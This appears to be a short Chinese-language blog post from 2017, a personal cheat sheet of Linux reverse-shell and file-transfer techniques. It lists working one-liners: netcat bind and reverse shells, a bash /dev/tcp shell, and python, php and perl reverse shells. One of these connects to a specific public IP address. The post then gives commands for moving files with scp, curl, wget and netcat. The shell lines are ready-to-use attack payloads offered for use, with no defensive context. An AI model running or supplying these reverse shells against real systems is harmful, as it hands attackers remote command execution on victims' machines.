Linux下反弹shell及传输文件的几种方法

Yokeen

2017-05-14

Linux, Web安全

Linux下反弹shell的几种方法

就先举几种常见的。

①nc

正向连接：
目标监听，本机去连
nc -l -p port -e /bin/sh(cmd.exe)
nc ip port

反向连接
本机监听，目标来连
nc -vv -l -p port
nc -e /bin/sh(cmd.exe) ip port

②bash
一方用nc监听
nc -vv -l -p port
/bin/bash -i >& /dev/tcp/ip/port 0>&1

③python版本
nc监听
nc -vv -l -p port

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“115.159.197.34”,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

④php版本
nc监听

php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

⑤perl版本
nc监听

perl -e ‘use Socket;$i=”10.0.0.1”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

还有其他的版本，java,ruby,没总结，可以自己去搜索一下。

相关文章：http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Linux不同发行版本之间拷贝文件

①ftp ,其中一台Linux安装ftp server,另一台使用ftp client来进行文件copy

②samba服务

③scp命令
从本地上传到远程
scp /home/xx root@10.10.10.10:/home/xx

然后输入对方相应帐号的登录密码即可

从远程上传到本地：
scp root@10.10.10.10:/home/xx /home/xx

再加几个

Linux中传输文件的：

curl下载文件：
curl -O url

wget

nc -l port > 要接收的文件
nc ip port < 要发送的文件

连接对方监听的shell:

lsof
看学长演示lsof也可以连接一个监听，刚才网上找了找资料没找到，快十点半了，就先不搞了